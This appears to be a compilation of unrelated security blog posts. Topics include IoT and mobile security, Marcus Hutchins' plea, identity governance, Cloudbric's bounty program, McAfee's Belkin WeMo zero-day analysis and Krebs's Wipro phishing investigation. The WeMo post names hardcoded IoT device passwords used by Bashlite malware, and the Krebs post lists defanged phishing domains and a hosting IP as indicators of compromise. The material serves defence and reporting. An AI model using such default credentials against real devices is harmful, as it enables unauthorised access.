If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first a picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, that will continue to grow to not only fit evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

Seqrite mSuite can be the perfect solution for the education industry

Estimated reading time: 3 minutes

While financial institutions like banks or other multinational corporations (MNCs) occupy the bulk of headlines when it comes to topics like cybersecurity and data breach, it would be foolish to disregard the threats that organizations in the education industry face. Consider the sheer scale of the kind of information a school, college or any other educational institution receives and stores. At the very least, this data will contain names, addresses, personal credentials, financial details, photos, medical information for potentially thousands of students and teachers. That is a massive amount of Personally Identifiable Information (PII).

Ultra-sensitive data

The nature of the data will most likely be ultra-sensitive. Educational institutes are attended by young students, some possibly even underage. This is extremely precarious data which can be dangerous and can ruin lives & families in the wrong hands. This is also exactly the kind of information that an attacker would want to replicate cyber identities for other types of crime. Attackers are also likely to target these type of organizations for two major reasons:  i) hackers sometimes correctly estimate that these organizations do not give cybersecurity its due importance, and ii) the kind of information educational institutes store are a veritable goldmine for them.

Hence, it is critical for educational sector organizations to invest in strong cybersecurity solutions, especially when it comes to mobile devices. As educational organizations get more connected, the number of entry points through a hacker can enter a closed network increase.

Seqrite mSuite is a simple and comprehensive yet extremely powerful tool which organizations in the educational sector can consider to manage all mobile devices running on Android and iOS. It allows the network manager to get total control over the apps being installed on official devices, monitor the internet usage patterns, track the device location, apply policies as per location and time and provide support through remote device control as well as file transfer. This allows the organization to remain in total control of what’s happening with its data even beyond their own network.

The benefits of Seqrite mSuite

In particular, the following features offered by Seqrite mSuite make it the perfect solution for the education industry:

  • Comprehensive Mobile Security & Anti-Theft

Since the solution is cloud-based, it can be easily used by educational institutions while offering comprehensive mobile security. Any mobile device can be easily located, locked or erased in case of theft or damage.

  • App Management

Educational institutes need to manage control of external applications in a digital classroom situation which mSuite’s App Management feature allows seamlessly. App Distribution pushes apps and updates from the server to the mobile with the ability of certain apps to be recommended. Custom apps can be published to a specified organizational App Store while App Control allows blacklisting or whitelisting of specific applications or certain categories of applications.

  • Launcher & Kiosk Mode

The launcher & kiosk mode feature is extremely useful for use in an educational environment. The launcher enables control over the use of apps on devices and enables the configuration of selected apps for use within the organization. This way, educational institutes can control the type of apps used by students and prevent the use of apps they want to disallow. The Kiosk mode, on the other hand, transforms a device to use a single app for a single purpose within a system kiosk mode which can be extremely useful for organizations who want to restrict mobile devices to just educational content.

  • Fencing & Data Monitoring

Seqrite mSuite allows digital boundaries to be defined and restrictions to be applied on devices in regards to Wi-FI, Geo and Time Fence. Through this feature, institutes can regulate usage of mobile devices within the digital classroom. Network Data Monitoring also allows the monitoring of data usage over mobile and Wi-Fi networks.

These features make Seqrite mSuite a great investment for educational organizations for usage in the digital classroom.

The post Seqrite mSuite can be the perfect solution for the education industry appeared first on Seqrite Blog.

The Mute Button: How to Use Your Most Underrated Social Superpower

For a Monday, the school day was turning out to be surprisingly awesome. Mackenzie sat with friends at lunch, chatted with her favorite teacher, and aced her English test.

Then came the shift.

It happened between 5th and 6th period when Mackenzie checked her Instagram account. One glance showed several posts from the popular girls (yet another party I wasn’t invited to, she thought). She saw her friend Emma’s Spring Break photos (how can someone look that good in a bikini, she wondered) followed by several whos-dating-who posts from blissful looking couples (when is someone going to love me, she mused). In less than 60 seconds, the images and comments Mackenzie saw had the power to subtly alter her heart and mind.

FOMO

Mackenzie isn’t alone. Studies have repeatedly linked Social networks with high levels of anxiety, depression, bullying and an emotional phenomenon called FOMO (fear of missing out) among teens and — if we’re honest — among plenty of adults.

We can’t control the perpetual stream of photos, comments, and videos that flood our social feeds. Social is here to stay, and to some extent, most of us are required to be online. However, we can control the amount and the quality of the content that comes at us. And, we can teach our kids to do the same.

It’s called the mute button, and it could be your family’s most underrated superpower when it comes to enjoying life online. Many people either don’t know about their mute button or forget they have it.

The mute button allows you to turn off someone’s feed (yes—make it vanish) without the awkwardness of unfollowing or unfriending them. The cool part: No one knows you’ve muted them, so there are no hurt feelings. You can still view a muted person’s profile, and they can see yours. You can send or receive direct messages as if everything were copacetic.

How to mute

Thankfully, you can mute people easily on most social networks.

To mute someone on Instagram, go to the person’s page, find to the three little dots in the top upper right of the page, click and choose mute (you can choose to mute their feed and their stories). You can mute someone on Facebook by going to the person’s main page and clicking the “friends” button under their photo. You will have the option to “unfollow,” which will mute the person’s content but allow you to stay friends. On Twitter, you can stop seeing a person’s tweets by going to the three dots in the top upper right corner and choosing “mute.”

This simple, powerful click will allow you to curate what you see in your feed every day and instantly block the content that is annoying or negative. The result? Fewer emotional darts are flying at you randomly throughout the day and, hopefully, a more enjoyable, positive experience online.

When to mute

What’ s considered annoying or offensive to one person may be entirely acceptable and even enjoyable to someone else. So, the reasons for muting someone can vary greatly.

A few reasons to mute might be: 

  • Inappropriate or offensive content
  • Mean, bullying, or reckless content
  • Posting too frequently
  • Excessive bragging, boasting, or self-promotion
  • Content that negatively impacts your mental health
  • Non-stop political posts or rants
  • Too many selfies
  • Graphic or disturbing images or videos
  • Constant negative or critical posts
  • Useless, uninteresting, or tedious information
  • Monopolizing conversations
  • Perpetual personal drama
  • Too much content on one topic

Talking points for families

Editing your social circle is okay. The voices that surround you have influence, so choose the voices you surround yourself with carefully. Also, being “friends” with 1,000 or even 300 people isn’t realistic or reflective of real life. Remind kids: That tug (or compulsion) you feel to like, comment, post, or chime in online should not rule your time or your mind. You (and your family) may be surprised how good it feels to whittle down the number of voices you allow into your day.

Pay attention to emotional triggers. In many ways, you are what you consume online. Ask yourself: Is this person’s account positive or negative? Does it make me feel included and worthy or excluded and less-than? Do I feel jealous, annoyed, or negative when I see this person’s updates, photos, or tweets? Edit boldly. You can mute negative accounts temporarily or permanently without guilt.

Less noise, less clutter. If you want things to be different, you have to do things differently, and this applies online. Forming your thoughts and opinions is much more difficult when you are constantly absorbing other people’s ideas. The less digital clutter, the more room for quiet contemplation and self-awareness, which is always a good idea for young and older mind minds alike.

Be brave, be you. Kids pay far more attention to friend and follower counts than adults do. They consider it intentional rejection when someone unfollows or unfriends them online. For that reason, you may need to reiterate the importance of putting mental health before popularity or people pleasing. Remind them: It’s okay to mute, unfollow, or unfriend any person who is not a positive influence on your heart and mind.

No one is everyone’s favorite. It’s impossible to like everyone or be liked by everyone — impossible. There will always be individuals who will get under your skin. And, at times, people may feel the same about you. This is a normal part of human relationships. This reality makes striving to be liked by everyone online an impossible, exhausting task.

The digital world is packed with ever-changing social complexities. Seemingly casual clicks can trigger an avalanche of positive or negative emotions that can take their toll (whether we realize it or not). Helping your child think proactively about content and take responsibility for the content comes across his or her screen, is more important than ever in raising wise, healthy digital kids.

The post The Mute Button: How to Use Your Most Underrated Social Superpower appeared first on McAfee Blogs.

Marcus Hutchins: UK ransomware ‘hero’ pleads guilty to US hacking charges

Hutchins says he regrets his actions and will continue ‘keeping people safe from malware attacks’

A British computer security researcher once hailed as a “hero” for helping stem a ransomware outbreak and later accused of creating malware to attack the banking system said on Friday he had pleaded guilty to US criminal charges.

Marcus Hutchins, whose arrest in 2017 stunned the computer security community, acknowledged in a statement pleading guilty to criminal charges linked to his activity in 2014 and 2015.

Related: UK hacker jailed for six years for blackmailing pornography site users

Continue reading...

Marcus “MalwareTech” Hutchins Pleads Guilty to Writing, Selling Banking Malware

Marcus Hutchins, a 24-year-old blogger and malware researcher arrested in 2017 for allegedly authoring and selling malware designed to steal online banking credentials, has pleaded guilty to criminal charges of conspiracy and to making, selling or advertising illegal wiretapping devices.

Marcus Hutchins, just after he was revealed as the security expert who stopped the WannaCry worm. Image: twitter.com/malwaretechblog

Hutchins, who authors the popular blog MalwareTech, was virtually unknown to most in the security community until May 2017 when the U.K. media revealed him as the “accidental hero” who inadvertently halted the global spread of WannaCry, a ransomware contagion that had taken the world by storm just days before.

In August 2017, Hutchins was arrested by FBI agents in Las Vegas on suspicion of authoring and/or selling “Kronos,” a strain of malware designed to steal online banking credentials. A British citizen, Hutchins has been barred from leaving the United States since his arrest.

Many of Hutchins’ supporters and readers had trouble believing the charges against him, and in response KrebsOnSecurity published a lengthy investigation into activities tied to his various online personas over the years.

As I wrote in summary of that story, the clues suggested “Hutchins began developing and selling malware in his mid-teens — only to later develop a change of heart and earnestly endeavor to leave that part of his life squarely in the rearview mirror.” Nevertheless, there were a number of indications that Hutchins’ alleged malware activity continued into his adulthood.

In a statement posted to his Twitter feed and to malwaretech.com, Hutchins said today he had pleaded guilty to two charges related to writing malware in the years prior to his career in security.

“I regret these actions and accept full responsibility for my mistakes,” Hutchins wrote. “Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Hutchins pleaded guilty to two of the 10 counts for which he was originally accused, including conspiracy charges and violating U.S.C. Title 18, Section 2512, which involves the manufacture, distribution, possession and advertising of devices for intercepting online communications.

Creating malware is a form of protected speech in the United States, but selling it and disseminating it is another matter. University of Southern California law professor Orin Kerr‘s 2017 dissection of the government’s charges is worth a read for a deep dive on this sticky legal issue.

According to a copy of Hutchins’ plea agreement, both charges each carry a maximum of up to five years in prison, up to a $250,000 fine, and up to one year of supervised release. However, those charges are likely to be substantially tempered by federal sentencing guidelines, and may take into account time already served in detention. It remains unclear when he will be sentenced.

The plea agreement is here (PDF). “Attachment A” beginning on page 15 outlines the government’s case against Hutchins and an alleged co-conspirator. The government says between July 2012 and Sept. 2015, Hutchins helped create and sell Kronos and a related piece of malware called UPAS Kit.

Despite what many readers here have alleged, I hold no ill will against Hutchins. He and I spoke briefly in a friendly exchange after a chance encounter at last year’s DEF CON security conference in Las Vegas, and I said at the time I was rooting for him to beat the charges. I sincerely hope he is able to keep his nose clean and put this incident behind him soon.

Yours Truly shaking hands with Marcus Hutchins in Las Vegas, August 2018.

Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series.

At Privacy Ref we are always thinking of ways to improve the experience of our followers and clients alike. Weekly on our YouTube channel you will find a relevant privacy topic being discussed in a 1-minute video such as:  Cookies walls and the Dutch DPA – Ben Siegel discusses his research on the Dutch Personal […]

The post Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series. appeared first on Privacy Ref Blog.

Five Reasons You Need Identity Governance & Administration

Demands on organizations continue to intensify – the precarious balance of requests for more access with the need to be more secure is difficult to maintain. Additionally, all of this is to be achieved faster, with fewer resources. It is more important than ever for each organization to develop a strategy for managing and governing user access in an automated manner. A well-defined Identity Governance Administration (IGA) program is becoming an increasingly critical piece of an organization’s security portfolio.

Small organizations with employees numbering in the double digits will be able to easily manage granting, removing, and reviewing access, and may even have predefined roles or access templates. Larger businesses, on the other hand, greatly benefit from implementing an IGA solution in order to effectively manage access to systems, applications, and devices. Read on to find out the many benefits of IGA and determine if it’s time for your organization to explore the world of IGA.

1. Regulatory Compliance

With regulations like the GDPR (General Data Protection Regulation), SOX (Sarbanes-Oxley), and HIPAA (Health Insurance Portability and Accountability Act) prioritizing and mandating data privacy, industries are focusing on access issues more than ever. Limiting and monitoring access to only those that need it is not only a crucial security measure, but one that is becoming critical to staying in compliance with these regulations.

IGA solutions not only help ensure that access to sensitive information like patient records or financial data is strictly controlled, they also enable organizations to prove they are taking these actions. Organizations can receive audit requests at any time. An effective IGA solution makes the required periodic review and attestation of access business friendly, effective, and comes with built-in reporting capabilities to meet relevant government and industry regulations. Taking a visual approach to the data can make this whole process more accurate and easier to deploy to the business.

2. Risk Management

The news cycle is dominated by stories of massive data breaches, with the organizations involved having to spend time and money on remediation efforts, while also dealing with the damage done to their reputation. IGA solutions take a proactive approach, reducing the exposure of sensitive data by rigorously limiting and guarding access to begin with, reducing the risk in the environment.

IGA solutions enable a robust approach to managing and governing access by focusing on three aspects of access. First, they practice the principle of least privilege, eliminating excess privileges and granting access to only those who absolutely need it in order to do their jobs. Secondly, they terminate ‘orphaned’ accounts as quickly as possible. These accounts that are no longer being used, either because an employee is no longer with the company, or any other reason, are perfect targets for those looking to breach the environment. Finally, IGA solutions monitor for segregation of duty (SoD) violations. This critical risk management concept dictates that no single individual should be able to complete a task, creating a built-in system of checks and balances. For example, in a financial transaction, whoever creates a payee should not be the one to authorize payment.

3. Business Changes

Organizations grow and change continually, and an IGA solution can make those changes more efficient and less risky. Small changes, like individual promotions, transfers, and layoffs, can quickly be implemented, since IGA solutions can provision access based on roles, and not on individual accounts. This strategy of Role Based Access Control (RBAC) works equally well for larger changes, like mergers, acquisitions, and corporate reorganizations. IGA solutions can greatly shorten the timeline for executing bulk additions or transitions of user accounts by automating and streamlining provisioning and approvals.  It is critical to develop roles in an accurate and intuitive manner.

4. Streamlining Budget

We all need to do more with less. Managing identity and access manually can be an unsustainable burden on IT. Provisioning access manually takes far more time, and often comes with additional help desk calls or tickets if these changes take too long or are done incorrectly. Documentation and reporting requirements add more effort and complexity. Certifying privileged access also becomes time consuming for managers and can result in rubber-stamping approvals in order to get on with more pressing matters. Carelessness in any of these tasks can lead to costly mistakes.

Of course, this also means that IT teams are sacrificing time that could be spent on other projects or improvements. IGA solutions minimize these time management issues and can also accomplish these tasks with higher accuracy.

5. Service Delivery

At its core, IGA solutions are designed to make life easier. Their usefulness impacts everyone within an organization. Establishing roles and streamlining provisioning makes for a much more efficient on-boarding process. The inefficiencies of a new-hire having to wait for access, sometimes for days or weeks, can be eliminated. Their accounts will be created with access already in place, based on their assigned role. Managers don’t have to waste time requesting access for employees, nor do they need to worry about making sure that former employees no longer have access. Ultimately, everyone will have the access they need when they need it, allowing everyone to get to work that much faster.

With these clear, measurable benefits, it’s easy to see why IGA solutions are quickly becoming an essential component in many organizations’ security strategy. Core Security, a HelpSystems Company, has developed multiple integrated IGA solutions to tailor fit your organization, since no two IT environments look alike. While these solutions have different approaches to IGA, they all provide these five critical benefits, and more. To find out which IGA solution is right for you, request a personalized demo from one of our experts today.

Identity and Access Management
Big text: 
Blog
Resource type: 
Blogs

Weekly Update 135

Weekly Update 135

It's another episode with Scott Helme this week as he's back in town for NDC Security on the Gold Coast (still a got a week to get those tickets, folks!) The timing actually works out pretty well as there was this week's announcement around Let's Encrypt transition of their root cert which is right up his alley. There's also the whole TicTokTrack kids watch situation which aligns very well with many of both our prior experience. And just on that, when we recorded the video they were planning on getting the service back up and running that day (Thursday Aus time when we recorded). Turns out that didn't happen and frankly, kudos to them for taking a little more time to get things right:

All that and more in this week's update:

Weekly Update 135
Weekly Update 135
Weekly Update 135

References

  1. We're at NDC Security on the Gold Coast week after next (Scott's doing the World's Best TLS Training, I'm doing Hack Yourself First)
  2. Let's Encrypt's transition to ISRG root (that post of Scott's went to number 1 on Hacker News so good work on that mate!)
  3. TicTocTrack had an absolute zinger of an IDOR vulnerability (they're not the only watch in this class to have serious flaws either)
  4. Twilio are sponsoring my blog this week, big thanks to them! (check our how you can use Authy to add 2FA to your app)

Cloudbric’s Threat DB To Open For Security Contributions And CLB Rewards

Cloudbric Labs renewal security

We’re super excited to announce the release of Threat DB on April 29, a community driven threat intelligence database for both end users and organizations to view a variety of threat information.

Threat DB is part of the renewed Cloudbric Labs in which you’ll notice that the same free security tools we previously introduced have been rebranded. 

Until now, threat intelligence has been highly privatized meaning security vendors are continuously collecting vast amounts of emerging cyber threat information but are not making it accessible for public use.

Instead, vendors typically use it for their own personal gain as we discuss in dept in our whitepaper

With the launch of Threat DB, users have access to our threat information (hacker wallet addresses, phishing URL, blacklisted IPs) without restrictions.

We aim to develop Threat DB into one of the largest decentralized global databases of cyber threat information and will be made transparent for public use.

However, it’s not just for end users to benefit.

Developers or companies interested in using the data from Threat DB can do so through our API, which is set to be available at a later release date.

Now here’s where the fun part begins!

Threat DB earn crypto

Users have the opportunity to get compensated in the form of cryptocurrency simply by adding valuable threat information to the database (to be verified by Cloudbric’s team of security experts).

In the future, existing Cloudbric users will also have the opportunity to be rewarded simply by submitting their logs following a hacking episode.

With the CLB Reward System, anyone can earn by signing up and contributing to Threat DB.

Although Threat DB only offers a collection of hacker fraud addresses, phishing URLs and blacklisted IPs for viewing and contributing at its beta stage, we strive to continuously expand our service and add more threat data in the future.

Head over now to Cloudbric Labs on April 29 to begin exploring our database which holds over 10,000+ threat data or begin contributing.

More details about the contribution and rewards process will be available on the Cloudbric Labs event page.  


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric’s Threat DB To Open For Security Contributions And CLB Rewards appeared first on Cloudbric.

Participate in Cloudbric’s Massive Scale Bounty Program + Event For More Rewards

Threat DB event bounty program

To celebrate the renewal of Cloudbric Labs including the launch of Threat DB, we’re also conducting a large scale bounty program in order to drive product improvement and improve our services on a secure platform.

To show our commitment, we’ve allocated 10 million CLB (10,000,000 CLB), which is approximately equivalent to $106,000 USD, just for the bounty program!

The bounty program and event will run for approximately 3 months (Monday, April 29 – Monday, July 22).

There will be two bounty events:

  • Bug bounty
  • Contribution bounty

So how do you participate?

Once Threat DB goes live on April 29, sign up to become a Cloudbric Labs member if you haven’t already. Once you’re logged in, go the contribute page and begin submitting your threat data.

Follow the instructions for that bounty and submit your threat data. That’s it!

You can check your status through the ranking charts for that specific bounty.  

*****Please note that those participants who are caught spamming or cheating the system will be immediately banned.

*****Please read and follow the event participation and bug bounty guidelines as found on the Event page of Cloudbric Labs: labs.cloudbric.com/event

Important information about the specific bounties can be found below!

Bug Bounty Program

  • Duration: April 29th Monday ~ May 24th Friday
  • Target Scope: Cloudbric Labs Homepage, Cloudbric Labs Threat DB
  • Target URL: labs.cloudbric.com, labs.cloudbric.com/threatdb, and all other sub URLs under Threat DB
  • Bounty rewards differ per vulnerability level
    • Very High: When the web server has been turned over to third parties, or when the services are disrupted and become unavailable
    • 1,000,000 CLB
    • Medium: When the server has sustained limited damage, or when server information has been falsified
    • 300,000 CLB
    • Low: From the possibility of attacks, such as when data vulnerabilities are gathered, to minor bugs like typos
    • 10,000 CLB
  • Participation type: Blind
  • How to Participate: Sign up with Cloudbric, then submit Bug Bounty Form
  • Rewards Distribution: Every Wednesday beginning May

Contribution Bounty

  • Duration: April 29th Monday ~ July 22nd Monday
  • CLB will be rewarded for users who contribute the highest number of threat data (only validated threat data with threat levels) every month
    • 1st: 1,000,000 CLB
    • 2nd: 600,000 CLB
    • 3rd: 400,000 CLB
    • 4th: 150,000 CLB
    • 5th: 100,000 CLB
    • Users with identical ranks will be re-ranked according to higher threat level, and submission date
  • Participation type: Blind: Open, Ranking Chart updated real time
  • How to Participate: sign up with Cloudbric Labs, and submit threat data to Threat DB
  • Rewards Distribution: End of every month beginning May

If you have any questions please email us at support@cloudbric.com!


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Participate in Cloudbric’s Massive Scale Bounty Program + Event For More Rewards appeared first on Cloudbric.

IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target?

Effective malware is typically developed with intention, targeting specific victims using either known or unknown vulnerabilities to achieve its primary functions. In this blog, we will explore a vulnerability submitted by McAfee Advanced Threat Research (ATR) and investigate a piece of malware that recently incorporated similar vulnerabilities. The takeaway from this blog is the increasing movement towards IoT-specific malware and the likelihood of this unique vulnerability being incorporated into future malware.

We are rapidly approaching the one-year mark for the date McAfee ATR disclosed to Belkin (a consumer electronics company) a critical, remote code execution vulnerability in the Belkin WeMo Insight smart plug.  The date was May 21st, 2018, and the disclosure included extensive details on the vulnerability (a buffer overflow), proof-of-concept, exploit code and even a video demo showing the impact, dropping into a root shell opened on the target device. We further blogged about how this device, once compromised, can be used to pivot to other devices inside the network, including smart TVs, surveillance cameras, and even fully patched non-IoT devices such as PCs. Initially, the vendor assured us they had a patch ready to go and would be rolling it out prior to our planned public disclosure. In January of 2019, Belkin patched a vulnerability in the Mr. Coffee Coffee Maker w/ WeMo, which McAfee ATR reported to Belkin on November 16th, 2018, and released publicly at Mobile World Congress in late February. We commend Belkin for an effective patch within the disclosure window, though we were somewhat surprised that this was the prioritized patch given the Mr. Coffee product with WeMo no longer appears to be produced or sold.

The Insight smart plug firmware update never materialized and, after attempts to try to communicate further, three months later, in accordance with our vulnerability disclosure policy, McAfee ATR disclosed the issue publicly on August 21st. Our hope is that vulnerability disclosures will encourage vendors to patch vulnerabilities, educate the security community on a vulnerable product to drive development of defenses and, ultimately, encourage developers to recognize the impact that insecure code development can have.

Fast forward nearly a year and, to the best of our knowledge this vulnerability, classified as CVE-2018-6692, is still a zero-day vulnerability.  As of April 10th, 2019, we have heard of plans for a patch towards the end of the month and are standing by to confirm. We intentionally did not release exploit code to the public, as we believe it tips the balance in favor of cyber criminals, but exploitation of this vulnerability, while challenging in some regards, is certainly straightforward for a determined attacker.

IoT-Specific Malware

Let’s focus now on why this vulnerability is enticing for malicious actors.  Recently, Trend Micro released a blog observing occasional in-the-wild detections for a malware known as Bashlite. This specific malware was recently updated to include IoT devices in its arsenal, specifically using a Metasploit module for a known vulnerability in the WeMo UPnP protocol. The vulnerability appears to be tied to a 2015 bug which was patched by Belkin and was used to fingerprint and exploit WeMo devices using the “SetSmartDevInfo” action and corresponding “SmartDevURL” argument.

We can say for certain that this Metasploit module is not targeting the same vulnerability submitted by McAfee ATR, which resides in the <EnergyPerUnitCostVersion> XML field, within the libUPnPHndlr.so library.

Analysis of Bashlite and IOT Device Targets

After briefly analyzing a few samples of the malware (file hashes from the aforementioned blog), the device appears to check for default credentials and known vulnerabilities in multiple IoT devices. For example, I came across a tweet after finding reference to a password in the binary of “oelinux123”.

This IoT device is an Alcatel Mobile Wifi, which has a number of known/default passwords. Notice the top username/password combination of “root:oelinux123.” When we analyze the actual malware, we can observe the steps used to enumerate and scan for vulnerable devices.

Here is a reference from the popular binary disassembly tool IDA Pro showing the password “OELINUX123” used to access a mobile WiFi device.

The next image is a large “jump table” used to scan through and identify a range of devices or targets using known passwords or vulnerabilities.

Next is some output from the “Echobot” scanner employed by the malware used to report possible vulnerabilities in target devices from the above jump table.

The final screenshot shows a list of some of the hardcoded credentials used by the malware.

The “huigu309” password appears to be associated with Zhone and Alcatel Lucent routers. Both routers have had several known vulnerabilities, backdoors and hardcoded passwords built into the firmware.

There is no need to continue the analysis further as the point of this is not to analyze the Bashlite malware in depth, but I did think it was worth expanding on some of the capabilities briefly, to show this malware is programmed to target multiple IoT devices.

Now to the point! The simple fact that generic WeMo Metasploit modules were added to this indicates that Belkin WeMo makes an interesting enough target that an unpatched vulnerability would be compelling to add to the malware’s capabilities. Hence, we believe it is possible, perhaps even likely, that malware authors already have or are currently working on incorporating the unpatched WeMo Insight vulnerability into IoT malware. We will be closely following threats related to this zero-day and will update or add to this blog if malware embedding this vulnerability surfaces. If the vendor does produce an effective patch, it will be a step in the right direction to reduce the overall threat and likelihood of weaponizing the vulnerability in malware.

How to Protect Your Devices

As this vulnerability requires network access to exploit the device, we highly recommend users of IoT devices such as the WeMo Insight implement strong WIFI passwords, and further isolate IoT devices from critical devices using VLANs or network segmentation. McAfee Secure Home Platform users can enable whitelisting or blacklisting features for protection from malicious botnets attempting to exploit this vulnerability.

Call to Action for Vendors, Consumers and Enterprise

It should be plain to see there is some low-hanging fruit in the industry of securing IoT devices. While some of the obvious simple issues such as hardcoded credentials are unexplainable, we understand that true software vulnerabilities cannot always be avoided. However, we issue a call-to action for IoT vendors; these issues must be fixed, and quickly too. Threat actors are constantly tracking flaws which they can weaponize, and we see a prime example of this in the Bashlite malware, updated for IoT devices including Belkin WeMo. By listening to consumer’s asks for security, partnering with researchers closely to identify flaws, and having a fast and flexible response model, vendors have a unique opportunity to close the holes in the products the world is increasingly relying on. Consumers can take away the importance of basic security hygiene; applying security updates when available, practicing complex password policy for home networks and devices, and isolating critical devices or networks from IoT.  Enterprise readers should be aware that just because this is an IoT consumer device typically, does not mean corporate assets cannot be compromised.  Once a home network has been infiltrated, all devices on that same network should be considered at risk, including corporate laptops.  This is a common method for cyber criminals to cross the boundary between home and enterprise.

The post IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target? appeared first on McAfee Blogs.

Better protection against Man in the Middle phishing attacks



We’re constantly working to improve our phishing protections to keep your information secure. Last year, we announced that we would require JavaScript to be enabled in your browser when you sign in so that we can run a risk assessment whenever credentials are entered on a sign-in page and block the sign-in if we suspect an attack. This is yet another layer of protection on top of existing safeguards like Safe Browsing warnings, Gmail spam filters, and account sign-in challenges.

However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework - CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in. Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.

What developers need to know

The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices. If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.

Wipro Intruders Targeted Other Major IT Firms

The crooks responsible for launching phishing campaigns that netted dozens of employees and more than 100 computer systems last month at Wipro, India’s third-largest IT outsourcing firm, also appear to have targeted a number of other competing providers, including Infosys and Cognizant, new evidence suggests. The clues so far suggest the work of a fairly experienced crime group that is focused on perpetrating gift card fraud.

On Monday, KrebsOnSecurity broke the news that multiple sources were reporting a cybersecurity breach at Wipro, a major trusted vendor of IT outsourcing for U.S. companies. The story cited reports from multiple anonymous sources who said Wipro’s trusted networks and systems were being used to launch cyberattacks against the company’s customers.

A screen shot of the Wipro phishing site securemail.wipro.com.internal-message[.]app. Image: urlscan.io

In a follow-up story Wednesday on the tone-deaf nature of Wipro’s public response to this incident, KrebsOnSecurity published a list of “indicators of compromise” or IOCs, telltale clues about tactics, tools and procedures used by the bad guys that might signify an attempted or successful intrusion.

If one examines the subdomains tied to just one of the malicious domains mentioned in the IoCs list (internal-message[.]app), one very interesting Internet address is connected to all of them — 185.159.83[.]24. This address is owned by King Servers, a well-known bulletproof hosting company based in Russia.

According to records maintained by Farsight Security, that address is home to a number of other likely phishing domains:

securemail.pcm.com.internal-message[.]app
secure.wipro.com.internal-message[.]app
securemail.wipro.com.internal-message[.]app
secure.elavon.com.internal-message[.]app
securemail.slalom.com.internal-message[.]app
securemail.avanade.com.internal-message[.]app
securemail.infosys.com.internal-message[.]app
securemail.searshc.com.internal-message[.]app
securemail.capgemini.com.internal-message[.]app
securemail.cognizant.com.internal-message[.]app
secure.rackspace.com.internal-message[.]app
securemail.virginpulse.com.internal-message[.]app
secure.expediagroup.com.internal-message[.]app
securemail.greendotcorp.com.internal-message[.]app
secure.bridge2solutions.com.internal-message[.]app
ns1.internal-message[.]app
ns2.internal-message[.]app
mail.internal-message[.]app
ns3.microsoftonline-secure-login[.]com
ns4.microsoftonline-secure-login[.]com
tashabsolutions[.]xyz
www.tashabsolutions[.]xyz

The subdomains listed above suggest the attackers may also have targeted American retailer Sears; Green Dot, the world’s largest prepaid card vendor; payment processing firm Elavon; hosting firm Rackspace; business consulting firm Avanade; IT provider PCM; and French consulting firm Capgemini, among others. KrebsOnSecurity has reached out to all of these companies for comment, and will update this story in the event any of them respond with relevant information.

WHAT ARE THEY AFTER?

It appears the attackers in this case are targeting companies that in one form or another have access to either a ton of third-party company resources, and/or companies that can be abused to conduct gift card fraud.

Wednesday’s follow-up on the Wipro breach quoted an anonymous source close to the investigation saying the criminals responsible for breaching Wipro appear to be after anything they can turn into cash fairly quickly. That source, who works for a large U.S. retailer, said the crooks who broke into Wipro used their access to perpetrate gift card fraud at the retailer’s stores.

Another source said the investigation into the Wipro breach by a third party company has determined so far the intruders compromised more than 100 Wipro systems  and installed on each of them ScreenConnect, a legitimate remote access tool. Investigators believe the intruders were using the ScreenConnect software on the hacked Wipro systems to connect remotely to Wipro client systems, which were then used to leverage further access into Wipro customer networks.

This is remarkably similar to activity that was directed against a U.S. based company in 2016 and 2017. In May 2018, Maritz Holdings Inc., a Missouri-based firm that handles customer loyalty and gift card programs for third-parties, sued Cognizant (PDF), saying a forensic investigation determined that hackers used Cognizant’s resources in an attack on Maritz’s loyalty program that netted the attackers more than $11 million in fraudulent eGift cards.

That investigation determined the attackers also used ScreenConnect to access computers belonging to Maritz employees. “This was the same tool that was used to effectuate the cyber-attack in Spring 2016. Intersec [the forensic investigator] also determined that the attackers had run searches on the Maritz system for certain words and phrases connected to the Spring 2016 attack.”

According to the lawsuit by Maritz Holdings, investigators also determined that the “attackers were accessing the Maritz system using accounts registered to Cognizant. For example, in April 2017, someone using a Cognizant account utilized the “fiddler” hacking program to circumvent cyber protections that Maritz had installed several weeks earlier.”

Maritz said its forensic investigator found the attackers had run searches on the Maritz system for certain words and phrases connected to the Spring 2016 eGift card cashout. Likewise, my retailer source in the Wipro attack told KrebsOnSecurity that the attackers who defrauded them also searched their systems for specific phrases related to gift cards, and for clues about security systems the retailer was using.

It’s unclear if the work of these criminal hackers is tied to a specific, known threat group. But it seems likely that the crooks who hit Wipro have been targeting similar companies for some time now, and with a fair degree of success in translating their access to cash given the statements by my sources in the Wipro breach and this lawsuit against Cognizant.

What’s remarkable is how many antivirus companies still aren’t flagging as malicious many of the Internet addresses and domains listed in the IoCs, as evidenced by a search at virustotal.com.

Update, April 19, 11:25 a.m. ET: I heard back from some of the other targets. Avanade shared the following statement:

